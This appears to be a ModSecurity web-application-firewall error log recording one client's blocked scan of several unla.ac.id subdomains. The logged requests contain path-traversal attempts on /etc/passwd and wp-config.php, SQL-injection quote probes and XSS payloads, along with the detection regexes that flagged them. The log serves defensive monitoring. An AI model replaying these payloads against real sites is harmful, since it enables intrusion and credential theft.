[Tue Aug 29 11:36:42.376460 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAWnjjAAAAAT"]
[Tue Aug 29 11:36:42.383367 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWlCdYAAAAR"]
[Tue Aug 29 11:36:42.399249 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWvFCYAAAAa"]
[Tue Aug 29 11:36:42.403069 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112sCo-f0AAAW51SoAAAAF"]
[Tue Aug 29 11:36:43.370492 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO1128Co-f0AAAWcCSoAAAAL"]
[Tue Aug 29 11:36:43.389374 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAN5YMIAAAAN"]
[Tue Aug 29 11:36:43.406587 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAWkfUcAAAAQ"]
[Tue Aug 29 11:36:43.428706 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAUbg9wAAABQ"]
[Tue Aug 29 11:36:44.381379 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAW1WakAAAAD"]
[Tue Aug 29 11:36:44.395287 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWnjjYAAAAT"]
[Tue Aug 29 11:36:44.425158 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAW51TEAAAAF"]
[Tue Aug 29 11:36:44.436907 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWx81AAAAAg"]
[Tue Aug 29 11:36:44.439945 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAVsUdwAAAAb"]
[Tue Aug 29 11:36:45.439968 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWkfU0AAAAQ"]
[Tue Aug 29 11:36:45.443916 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113cCo-f0AAAWuqzIAAAAZ"]
[Tue Aug 29 11:36:46.389116 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113sCo-f0AAAWkfU8AAAAQ"]
[Tue Aug 29 11:36:47.462904 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1138Co-f0AAAW1WboAAAAD"]
[Tue Aug 29 11:36:49.397595 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWnjkwAAAAT"]
[Tue Aug 29 11:36:49.416621 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWkfWAAAAAQ"]
[Tue Aug 29 11:36:49.419114 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAW1WcYAAAAD"]
[Tue Aug 29 11:36:49.435117 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWwdRQAAAAe"]
[Tue Aug 29 11:36:49.511854 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAN5YNwAAAAN"]
[Tue Aug 29 11:36:56.366833 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAVsUiEAAAAb"]
[Tue Aug 29 11:36:56.519531 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAV9b3MAAAAA"]
[Tue Aug 29 11:36:56.521519 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAUbg-kAAABQ"]
[Tue Aug 29 11:36:56.552387 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWx820AAAAg"]
[Tue Aug 29 11:36:56.574180 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAVsUicAAAAb"]
[Tue Aug 29 11:36:57.427400 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCf8AAAAR"]
[Tue Aug 29 11:36:57.494452 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCgIAAAAR"]
[Tue Aug 29 11:36:57.551878 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWx83cAAAAg"]
[Tue Aug 29 11:36:57.554443 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWlCgQAAAAR"]
[Tue Aug 29 11:36:57.571556 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAV9b4AAAAAA"]
[Tue Aug 29 11:36:58.474950 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO116sCo-f0AAAUbhAoAAABQ"]
[Tue Aug 29 11:37:05.410911 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO118cCo-f0AAATfd8MAAAAk"]
[Tue Aug 29 11:37:06.778681 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO118sCo-f0AAAQSWbcAAAA0"]
